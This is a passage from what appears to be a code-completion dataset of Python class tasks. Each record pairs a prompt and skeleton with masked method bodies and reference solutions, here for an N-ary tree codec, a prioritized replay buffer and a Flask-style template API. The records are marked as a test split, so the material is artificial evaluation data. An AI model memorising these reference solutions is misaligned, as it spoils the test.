in new_str:\n root.children.append(self.deserialize(sub_str))\nreturn root"], "bodies_text": "<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000321", "length_bytes": 1792, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "revision_id": "90fd00246707b23d60a5d13b5a89d5b5f64ad008", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "python_solution/0428.py", "source_repo": "Dongzi-dq394/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "da870b8b761d45d90f2b88d06d0fd53082368f15", "bodies": ["assert alpha >= 0\nsuper(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\nself.max_priority, self.tree_ptr = (1.0, 0)\nself.alpha = alpha\ntree_capacity = 1\nwhile tree_capacity < self.max_size:\n tree_capacity *= 2\nself.sum_tree = SumSegmentTree(tree_capacity)\nself.min_tree = MinSegmentTree(tree_capacity)", "transition = super().store(obs, act, rew, next_obs, done)\nif transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\nreturn transition", "assert len(self) >= self.batch_size\nassert beta > 0\nindices = self._sample_proportional()\nobs = [self.obs_buf[i] for i in indices]\nnext_obs = [self.next_obs_buf[i] for i in indices]\nacts = [self.acts_buf[i] for i in indices]\nrews = [self.rews_buf[i] for i in indices]\ndone = [self.done_buf[i] for i in indices]\nweights = np.array([self._calculate_weight(i, beta) for i in indices])\nreturn PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)", "assert len(indices) == len(priorities)\nfor idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)", "indices = []\np_total = self.sum_tree.sum(0, len(self) - 1)\nsegment = p_total / self.batch_size\nfor i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\nreturn indices", "p_min = self.min_tree.min() / self.sum_tree.sum()\nmax_weight = (p_min * len(self)) ** (-beta)\np_sample = self.sum_tree[idx] / self.sum_tree.sum()\nweight = (p_sample * len(self)) ** (-beta)\nweight = weight / max_weight\nreturn weight"], "bodies_text": "<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "class_docstring": "Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight", "class_name": "PrioritizedReplayBuffer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000322", "length_bytes": 26535, "license_type": "no_license", "methods": [{"docstring": "Initialization.", "name": "__init__", "signature": "def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99)"}, {"docstring": "Store experience and priority.", "name": "store", "signature": "def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]"}, {"docstring": "Sample a batch of experiences.", "name": "sample_batch", "signature": "def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]"}, {"docstring": "Update priorities of sampled transitions.", "name": "update_priorities", "signature": "def update_priorities(self, indices: List[int], priorities: np.ndarray)"}, {"docstring": "Sample indices based on proportions.", "name": "_sample_proportional", "signature": "def _sample_proportional(self) -> List[int]"}, {"docstring": "Calculate the weight of the experience at idx.", "name": "_calculate_weight", "signature": "def _calculate_weight(self, idx: int, beta: float)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_003271", "prompt": "Implement the Python class `PrioritizedReplayBuffer` described below.\n\nClass description:\nPrioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\n\nMethod signatures and docstrings:\n- def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99): Initialization.\n- def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]: Store experience and priority.\n- def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]: Sample a batch of experiences.\n- def update_priorities(self, indices: List[int], priorities: np.ndarray): Update priorities of sampled transitions.\n- def _sample_proportional(self) -> List[int]: Sample indices based on proportions.\n- def _calculate_weight(self, idx: int, beta: float): Calculate the weight of the experience at idx.", "prompted_full_text": "Implement the Python class `PrioritizedReplayBuffer` described below.\n\nClass description:\nPrioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\n\nMethod signatures and docstrings:\n- def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99): Initialization.\n- def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]: Store experience and priority.\n- def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]: Sample a batch of experiences.\n- def update_priorities(self, indices: List[int], priorities: np.ndarray): Update priorities of sampled transitions.\n- def _sample_proportional(self) -> List[int]: Sample indices based on proportions.\n- def _calculate_weight(self, idx: int, beta: float): Calculate the weight of the experience at idx.\n\n<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "revision_id": "60e0c3389724460b5b32ba35c89d8838da4d51c9", "skeleton": "<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n", "source": "the_stack_v2_python_sparse", "source_path": "lrec2022-odinsynth/python/rl_rainbow_implementation.py", "source_repo": "clulab/releases", "split": "test", "star_events_count": 29} {"blob_id": "8e51b0b6bfae44443262781e402c34f42b9914d2", "bodies": ["template = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\nreturn self.make_response({'template': template})", "self.reqparse.add_argument('template', type=str, required=True)\nargs = self.reqparse.parse_args()\ntemplate = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\nchanges = diff(template.template, args['template'])\ntemplate.template = args['template']\ntemplate.is_modified = True\ndb.session.add(template)\ndb.session.commit()\nauditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\nreturn self.make_response('Template {} has been updated'.format(template_name))", "template = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\ndb.session.delete(template)\ndb.session.commit()\nauditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\nreturn self.make_response({'message': 'Template has been deleted', 'templateName': template_name})"], "bodies_text": "<|body_start_0|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "class_docstring": "", "class_name": "TemplateGet", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000323", "length_bytes": 4164, "license_type": "permissive", "methods": [{"docstring": "Get a specific template", "name": "get", "signature": "def get(self, template_name)"}, {"docstring": "Update a template", "name": "put", "signature": "def put(self, template_name)"}, {"docstring": "Delete a template", "name": "delete", "signature": "def delete(self, template_name)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002655", "prompt": "Implement the Python class `TemplateGet` described below.\n\nClass description:\nImplement the TemplateGet class.\n\nMethod signatures and docstrings:\n- def get(self, template_name): Get a specific template\n- def put(self, template_name): Update a template\n- def delete(self, template_name): Delete a template", "prompted_full_text": "Implement the Python class `TemplateGet` described below.\n\nClass description:\nImplement the TemplateGet class.\n\nMethod signatures and docstrings:\n- def get(self, template_name): Get a specific template\n- def put(self, template_name): Update a template\n- def delete(self, template_name): Delete a template\n\n<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n 